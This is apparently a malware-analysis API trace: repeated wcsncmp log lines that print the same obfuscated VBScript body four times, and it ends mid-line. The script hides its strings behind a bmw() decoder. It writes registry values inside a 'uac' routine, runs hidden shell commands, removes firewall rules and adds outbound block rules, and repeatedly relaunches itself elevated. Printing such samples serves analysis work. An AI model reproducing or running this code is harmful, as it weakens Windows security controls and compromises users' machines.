bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0222.980] wcsncmp (_String1="_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.980] wcsncmp (_String1="BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0222.980] wcsncmp (_String1="LOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.980] wcsncmp (_String1="OCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 